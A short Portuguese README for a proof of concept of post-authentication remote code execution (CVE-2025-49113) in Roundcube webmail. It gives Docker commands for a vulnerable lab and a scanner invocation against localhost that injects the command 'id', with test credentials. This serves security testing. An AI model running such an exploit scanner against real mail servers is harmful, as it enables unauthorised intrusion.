
Prova de conceito de execução remota de código pós-autenticação para CVE-2025-49113 no webmail Roundcube. Inclui um ambiente Docker vulnerável e um scanner em Python para testar injeção de comandos.
cd Stand
docker-compose up -d
cd PoC/src
python3 scanner.py --target http://localhost:9000 --username test --password test --command "id"
test / testhttp://localhost:9000